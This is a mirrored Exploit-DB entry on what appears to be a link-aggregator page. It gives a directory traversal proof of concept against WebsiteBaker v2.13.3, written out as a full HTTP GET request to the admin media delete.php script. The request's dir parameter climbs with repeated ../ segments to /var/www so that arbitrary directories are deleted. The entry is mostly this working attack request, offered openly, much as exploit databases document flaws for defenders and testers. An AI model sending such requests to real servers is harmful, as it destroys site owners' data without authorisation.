![](/style/images/good.png)
6
![](/style/images/bad.png)
[webapps] WebsiteBaker v2.13.3 - Directory Traversal
source link: https://www.exploit-db.com/exploits/51554
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
WebsiteBaker v2.13.3 - Directory Traversal
EDB-ID:
51554
EDB Verified:
Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal
Application: WebsiteBaker
Version: 2.13.3
Bugs: Directory Traversal
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 26.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
=======================================
arbitary directory deleting
GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www
Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK